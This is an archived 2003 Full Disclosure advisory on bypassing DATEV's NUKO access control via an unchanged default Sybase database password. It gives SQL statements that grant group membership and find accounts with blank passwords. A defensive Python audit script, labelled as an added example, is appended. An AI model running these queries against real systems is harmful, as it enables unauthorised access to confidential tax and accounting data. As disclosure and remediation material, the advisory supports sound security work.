Full Disclosure mailing list archives
(no subject)
From: <t4rku5 () hushmail com>
Date: Fri, 31 Oct 2003 05:20:28 -0800
Topic: DATEV Nutzungskontrolle Bypassing
Release Date: 2003-10-31

Affected system:
================
- Nutzungskontrolle V.2.2
- Nutzungskontrolle V.2.1

Unaffected system:
==================
- none known

Summary:
========
DATEV eG is a German company which makes software for tax advisors and lawyers. The Nutzungskontrolle (NUKO) is software to restrict access for the users. For example, a normal user is not allowed to see the internal reward accounting data. These data are restricted by the NUKO by, for example, blocking the "advisor number", which is used for all data in the internal reward accounting.

Issue:
======
It is possible to find out simple or blank passwords in the NUKO by searching in the NUKO database. The problem is that DATEV changed the default database password for all their databases, except for the NUKO DB. At the moment the Sybase ASA database is used to manage this stuff. I will not write the login password down here, because I think it is no problem to find this with Google.

1. First you have to add the default superuser to the group DATEV:
   example: GRANT MEMBERSHIP IN GROUP DATEV TO "the superuser login" (without "")

2. Then just make a query to the table u_nkw_passwords for the column nk_password to check where a password hash 3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D is.
   example: select nk_user_id from u_nkw_passwords where nk_password = '3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D'

3. Now query the user name of the nk_user_id.
   example: select nk_user_name from u_nkw_users where nk_user_id = 'one of the userid from 2.'

4. Now you have a NUKO login with a blank password.

Workaround:
===========
Change the default database password.

Credits:
========
Discovered by t4rku5
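For administrators who want to find affected accounts so that real passwords can be set, the check from steps 2 and 3 can be run as an audit. The script below is an added example, not part of the original post and not DATEV code. It assumes a CSV export that joins u_nkw_users and u_nkw_passwords on nk_user_id; the sample rows are constructed, and treating equal hashes as equal passwords assumes the hash is unsalted, which the single fixed blank-password value suggests.

```python
import csv
import io
from collections import defaultdict

# Hash the advisory reports for a blank NUKO password (one 16-hex block, four times).
BLANK_HASH = "3D7595A98BFF809D" * 4

# Constructed sample rows: nk_user_id, nk_user_name, nk_password.
# Column names are from the advisory; users and non-blank hashes are made up.
SAMPLE_ROWS = [
    ("1", "admin", BLANK_HASH),
    ("2", "meier", "A1" * 32),
    ("3", "schulz", BLANK_HASH.lower()),   # same hash, different letter case
    ("4", "weber", "B2" * 32),
    ("5", "koch", "a1" * 32),              # same hash as meier
]
SAMPLE_EXPORT = "nk_user_id,nk_user_name,nk_password\n" + "\n".join(
    ",".join(row) for row in SAMPLE_ROWS
)


def audit(export_text):
    """Return (blank, shared) from a CSV export of the joined tables.

    blank  -- sorted user names whose hash is the blank-password value
    shared -- sorted groups of user names that have identical hashes
              (assumption: the hash is unsalted, so equal hashes mean
              equal passwords)
    """
    by_hash = defaultdict(list)
    for row in csv.DictReader(io.StringIO(export_text)):
        digest = row["nk_password"].strip().upper()  # normalise hex case
        by_hash[digest].append(row["nk_user_name"].strip())
    blank = sorted(by_hash.pop(BLANK_HASH, []))
    shared = sorted(sorted(names) for names in by_hash.values() if len(names) > 1)
    return blank, shared


if __name__ == "__main__":
    blank, shared = audit(SAMPLE_EXPORT)
    print("Accounts with a blank password:", ", ".join(blank) or "none")
    for group in shared:
        print("Accounts sharing one password:", ", ".join(group))
```

Every account the audit lists needs a new password, in addition to the workaround of changing the default database password.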